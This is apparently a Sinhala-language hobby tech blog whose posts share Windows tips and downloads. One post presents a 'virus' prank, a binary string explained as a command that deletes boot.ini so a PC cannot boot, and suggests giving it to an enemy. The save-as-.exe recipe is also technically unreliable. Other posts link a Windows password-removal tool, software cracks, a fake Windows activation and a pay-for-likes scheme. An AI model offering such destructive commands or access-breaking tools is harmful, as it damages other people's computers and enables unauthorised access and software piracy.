WELCOME TO THE ESTATE OF GSNET.GIVING ENTERTAINTMENT EVERYTIME.JOIN WITH US.IT'S FOR YOU.....

Admin password කඩමු...ඕන Os එකක් ..(win7,vista..)




මේක ගොඩක් වටින software එකක්.මේකෙන් ඕනම windows operating system එකක (win xp,win vista,win 7.....) administrator,user password කඩන්න පුලුවන්.මුලින්ම ඔය software(image) එක download කරගන්න.


http://thepiratebay.se/torrent/6525257/ALL_Windows_Password_Remover

ඊට පස්සේ ඔය image එක cd එකකට burn කරගන්න.දෑන් cd එකෙන් computer එක බූට් කරන්න...

ඊලගට ඔයගේ computer එකේ තියෙන windows operating systems ටික වෑටෙයි.ඒ කිව්වේ dual boot එහෙම දාලා තියෙනවනම්. එතනින් එකක් select කරම operating system එකේ තියෙන user accounts,administrator ඔක්කොම වෑටනෙවා.ඊට පස්සේ ඔයාට කෑමති account එකක් තෝරලා password remove කරන්න පුළුවන් ....


Leave a comment

virus නම් virus මෙන්න !



හරි , අද මන් කස්ටියට කියන්න හදන දේ තමයි පොඩි ගේමක් දෙන හැටි. චුට්ටක් බයානකයි හොදේ. පස්සේ
කිව්වේ නැ කියන්න එපා.
හරි, වැඩේ පටන් ගමු....

පියවර 1
 ඉස්සෙල්ලම මේ කෝඩ් එක නෝට්පෑඩ් එකට කොපි කරගන්න.

01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001


පියවර 2

ඉටපස්සෙ Save As ගිහින් .exe විදියට Save කරගන්න



මේක මෙන්න මෙ විදියට del /F/S/Q c:\boot.ini මේකෙන් boot.ini එක මැකෙනවා. එතකොට PC 1ක
boot වෙන්නේ නැතිව යනවා. සොරි තමා... :


කොම්පුටරේ කඩාගෙන ඔන්න මට එහෙම කියන්න එපා.තරහකාරයෙක් එහෙම ඉන්නවනම් ඔන්න එයාගේ pc එකට දෙන්න නියම වැඩේ..................

Leave a comment

Adobe cs6 master collection download- by GsNet



හරි.අද මම ඔයාලට දෙන්න යන්නේ Adobe cs6 master collection එක .මේක සල්ලි දීල ගන්නවානම් ලොකු ගානක් යනවා.එත මම අද ඔයාලට මේක නොමිලේ දෙනවා.වැඩි කතාබහ ඕනේ නැ .පහල ලින්කු දල තියෙනවා.

1.)ඉස්සෙල්ලම ඒගොල්ලෝ දෙන trail version එක බාගන්න.


2.)ඊට පස්සේ crack එක දෙන්න .එච්චරයි.

download crack

දිගටම අපිත් එක්ක ඉන්න හොදේ.

1 Comment

Desktop එක මේසය මතට එයි - ( Real desktop )




මේක දාගත්තහම ඔයාට ඔයාගේ Desktop එක පෙනෙන්නේ හරියටම කිව්වොත් මේසයක් උඩ තියලා වගේ.ඔයාට ඕනෙනම් ඔයාගෙ ඔය මේසය උඩ තියෙන Icons එහෙම වීසිකරන්න පුළුවන්.හැබැයි ඔය Icons එහෙමෙහෙ යවලා අපිලිවල කරගන්නවා වගේ නෙමෙයි ඕවා ආයිත් තිබ්බ විදිහට හටදන්න ගියාම.එපා වෙනවා.මේකේ Icons තියෙන්නේ හරියට පොඩි පොඩි Disc වගේ.මේකේ තියෙන Icons Delete කරනකොට කරන්න තියෙන්නේ ඕන කරන Icon එක අරන් ගිහින් Recycle Bin එකට අතහරින්න එතකොට ඒක ලස්සනට Recycle Bin එකට වැටෙනවා.වැටෙනවා කිව්වට ඒක වැටෙන්නේ නැ.පොඩ්ඩක් එතන එහාපැත්ත බැලුවොත් ඔයාට ඒ Icon එක දැකගන්න පුළුවන්.ඔයාට මේ මේස Desktop එකෙන් අයින් වෙන්න ඕනෙනම් පහලින් Task Bar එකේ  පෙන්නන Program වලින් මේ program එකට අදාල Icon එක උඩ Right Click කරලා Exit කරන්න.




TO DOWNLOAD 
  CLICK HERE

Leave a comment

ඔබ සැමට පින්බර වෙසක් මංගල්‍යයක් වේවා....!!!




ඔබට, ඔබ පවූලේ සියලු දෙනාටමත් සුභම සුභ වෙසක් මංගල්‍යයක් 


වේවායි පතමි. සම්මා සම්බුදු සරණයි !!! දළඳා සමිදු පිහිටයි !!!...


- GsNet-

Leave a comment

ms office 2010 නොමිලේ !






ඔෆිස් 2010 තමා අද ඔයාලට දෙන්න හදන්නෙ.. මේ වෙනකො‍ට ඔෆිස් 2010 පැකේජය දෙකෝටි පනස් ලක්ෂයක් ‍විකිනිලාලු.. මයික්‍රොසොෆට්ල කියනව ගෙවිච්ච හැම තත්පරයක් පාසාම ඔෆිස් 2010 පැකේජයක් විකිණිලාලු.. කොහොමද ලාබෙ.... එච්චර විකිනිච්ච එකේ අපි එකක් ක්‍රැක් දාල පාවිච්චි කලාට පවු නෑ...... ඔන්න පල්ලෙහයින් දැම්ම 





INSTRUCTIONS
1. Open the folder Office 2010.

2. Run Professional Plus, and install or upgrade.

3. If you cannot upgrade then desintall the previous version of office.

4. Use the legit product key when asked.

4. enjoy your free Microsoft Office 2010 Pro Plus





Leave a comment

windows 8 නොමිලේ අත්හදා බැලීමට දෙයි !





Windows 8 Developer Preview සංස්කරණක අතහදා බැලීමෙන් පසුව බොහෝ දෙනෙක් බලා සිටියේ windows 8 ස්ථාවර සංස්කරණයක් පැමිණෙන තුරු. දැන් Microsoft සමාගම විසින් Windows 8 හි Consumer Preview එකක් එළි දක්වා තිබෙනවා. ඔබටත් එය බාගත කරගෙන ස්ථාපනය කොට බැලිය හැකියි.






මයික්‍රොසොෆ්ට් සමාගම විසින් මේ සඳහා මෘදුකාංගයක් නිපදවා තිබෙනවා. එය ස්ථාපනය කර ගත්විට ඒ හරහාම Windows 8 ස්ථාපනය කරගත හැකියි. අදාල මෘදුකාංගය මගින් ඔබගේ පරිගණකය ගැන සොයා බලා එයට ගැලපෙන්නේ Windows 8 හි කිනම් සංස්කරණයක්ද (x64, x86) යන්න තෝරා එය ස්ථාපනය කිරීමට පහසුකම් සලසා දෙනවා. එම මෘදුකාංගය පහත සබැදියෙන් බාගත කිරීමට හැකියි.




තවද ඔබට ISO Image ගොණු බාගත කිරීමට අවැසිනම් ඒ සඳහාත් ඔවුන් පහසුකම් සපයා තිබෙනවා. ඔබටත් පහත සබැඳියෙන් ගොස් ISO ගොණු ලබාගත හැකියි.





Leave a comment

Hard disk එකේ ඉඩ මදිද ?





හාඩි ඩිස්ක් එකේ ඉඩ මදිනම් මේ ක්‍රම 2 යොදාගෙන බලන්න. මේක හරියට අපේ පරිගණකයට තවත් හාඩි ඩිස්ක් එකක් හයි කළා වගේ තමයි.  මේ ක්‍රමය ගොඩක් අය භාවිතා කරන්නේ නැ..ඒ හින්දා තමයි මේක ඔයගොල්ලන්ට කියලා දෙන්න හිතුවේ....






ක්‍රමය 





පියවර 1 - මේකේ නම Gmail Drive. මුලින්ම ඒක ලබාගෙන පරිගණකයට ඉන්ස්ටොල් කරගන්න.. මේකෙදි මේ අය අපිට 7.3 GB පමණ ස්පෙස් එක ලෙස ලබාදෙනවා...

Gmail Drive මෘදුකාංගය  ගන්න..  DOWNLOAD

පියවර 2 - දැන් My Computer එක ඇතුලේ Gmail Drive කියලා අලුත් Drive එකක් හැ‍දිලා තියෙයි.. මේ වෙබ් හාර්ඩ් ඩිස්ක් එක තුල 10MB වලට වඩා අඩු ධාරිතාවයෙන් යුත් ෆයිල්ස් තැන්පත් කරගන්න පුලුවන්..

පියවර 3 - මේක භාවිතා කිරිමට මුලින්ම අපිට අපේ තියෙන Gmail Address එකෙන් ලොග් වෙලා ඉන්න ඕන..ඒකට My Computer එක ඇතුලේ තියෙන Gmail Drive කියන එක උඩ ඩබල් ක්ලික් කරාම හරි...

පියවර 4 - මේක ඇතුලට ‍ෆයිල්ස් යවන්න ඕන මේ විදිහටයි... අපිට යවන්න ඕන ෆයිල් එක උඩ රයිට් ක්ලික් කරලා එතනින් Send To කියන විධානයෙන් Gmail Drive ලෙස යෙදිමෙනුයි..

මේක ඉතා පහසු කටයුත්තක්..හැබැයි Gmail Drive එක පරිගණකයෙන් ඉවත් කරනවානම් එකේ ඇතුලේ තියෙන ෆයිල්ස් ටික නැවතත් ලබාගන්න අමතක කරන්න එපා..


ක්‍රමය 







පියවර 1 - මේකේ නම open Drive. මුලින්ම ඒක ලබාගෙන පරිගණකයට ඉන්ස්ටොල් කරගන්න.. 

open Drive මෘදුකාංගය  ගන්න..  To get open drive

පියවර 2 - දැන් My Computer එක ඇතුලේ openDrive කියලා අලුත් Drive එකක් හැ‍දිලා තියෙයි.. 

පියවර 3 - මේක භාවිතා කිරිමට මුලින්ම අපිට අපේ තියෙන open drive Address එකෙන් ලොග් වෙලා ඉන්න ඕන.
.ඒකට My Computer එක ඇතුලේ තියෙන open Drive කියන එක උඩ ඩබල් ක්ලික් කරාම හරි...

මේක ඉතා පහසු කටයුත්තක්..හැබැයි open Drive එක පරිගණකයෙන් ඉවත් කරනවානම් එකේ ඇතුලේ තියෙන ෆයිල්ස් ටික නැවතත් ලබාගන්න අමතක කරන්න එපා..





Leave a comment

WINDOWS 7 හී සැගවුණු THEME 4 ක් එළියට ගමු ?





අපි හැමෝම හිතන්නේ නැහැනේ මයික්‍රෝසොෆ්ට් ආයතනය විසින් අපගේ වින්ඩෝස් 7 සමග Themes එව්වට තවත් Themes 4ක් හංගලා තියෙනවා කිව්වම.අපිට පුළුවන් ඒ Themes 4 අපගේ අනිත් Themes සේව් වී තිබෙන Personalize වෙත ගන්න පුළුවන්. ZA - South Africa, GB - Great Britain(England), CA - Canada, AU - Australia යන Themes 4 තමා හංගලා තියෙන්නේ.හරි මම පහතින් කියල තියෙන විදියට කිරීමෙන් එම Themes 4 Personalize වෙත ලබාගත හැකිය.


 1. ) පළමුව ඔබ My Computer වින්ඩෝව විවෘත කරගන්න.එහි ඇති Local Disk (C) වෙත පිවිසෙන්න.



2.) අනතුරුව  ලැබෙන වින්ඩොව් ඒකෙන් Windows Folder එක තෝරාගන්න.


3.) එහිදී  ලැබෙන වින්ඩොව් ඒකෙන් winsxs folder ඒක තෝරාගන්න.


4.) එහිදී  Search box එකේ *.theme ලෙස ටයිප් කරන්න.


5.) අනතුරුව පහත ආකාරයේ වින්ඩොව් එකක් ලැබෙයි.


6.) එහි ඇති ZA, GB, CA, AU ලෙස දක්වා ඇති Themes 4 Double ක්ලික් කිරීමෙන් Save කරගත හැකිය.






Leave a comment

" FACEBOOK LIKE " වලින් සල්ලි හොයමු





ඔයගොල්ලෝ කැමති නැද්ද නිකන්ම Facebook එකේ likes දාන්නේ නැතුව අපි දාන like වලින් කීයක් හරි හම්බ කරන්න ?මෙන්න එ සදහා හොදම විදිය....

මුලින්ම පහත දක්වා ඈති රැපය මත click කර සේවාව ලබා ගන්න? දෙවනුව අවශ්‍ය විස්තර ලබා දී Register වෙන්න?ඔබටත් Facebook තුල Fan Page එකක් ඈත්නමි එයද මෙම සේවාවට එකතු කර,ඔබගේ Fans සංඛ්‍යාව වැඩි කර ගත හැකිය,දැන් එම සේවාව නිර්දේශ කරන Pages වලට like කර $$$   ( money) හොයාගන්න.


Leave a comment

ඔබගේ windows 7 genuine ද ?




ඉතින් මම අද ඔයගොල්ලන්ට දෙන්න යන්නේ මේ සොෆ්ට්වෙයාර් එක තමයි. ඔයගොල්ලන්ගේ හරි, ඔයගොල්ලන්ගේ යාළුවෙකුගේ හරි වින්ඩෝස් සෙවන් නිර්ව්‍යාජ නැතිනම් මේ සොෆ්ට්වෙයාර් එක දෙන්න තියෙන්නේ.


මේක බාගෙන ඉවරවෙලා Application ෆයිල් එක රන් කරන්න. සොෆ්ට්වෙයාර් එක යතුර ඉල්ලුවාම ඔයාගේ වින්ඩෝස් එකේ වර්ගේ (Starter, Home Basic, Home Premium, Ultimate) තෝරලා Keys කියන ෆයිල් එකෙන් ඒකට අදාල යතුර දීලා රන් කරන්න. ඔයාගේ වින්ඩෝස් එක genuine වෙයි.



Leave a comment

පරිගණකයේ Dekstop එක ලස්සන කර ගන්න

   

 


මෙන්න මම ඔයාලට මැක්සා මෘදුකාංගයක් අරගෙන අවා...මමත් මෙක පාවිචි කරනවා..මේ මෘදුකාංගයෙන් අපේ පරිගණකයේ ඩෙක්ස්ටොප් එකේ ෆයිල් ලස්සන හදා ගන්න පුලුවන්...ඉතින් ඔයලත් ආස නම් මේ මෘදුකාංගයට මම පහල් ලින්ක් දිලා තියෙනවා..හැමොම බා ගන්න.. 











Stardock Objectdock මෙතනින් බා ගන්න 


ඔයාලගේ අදහසක් මේ ලිපියට දිලා යන්න.. 

Leave a comment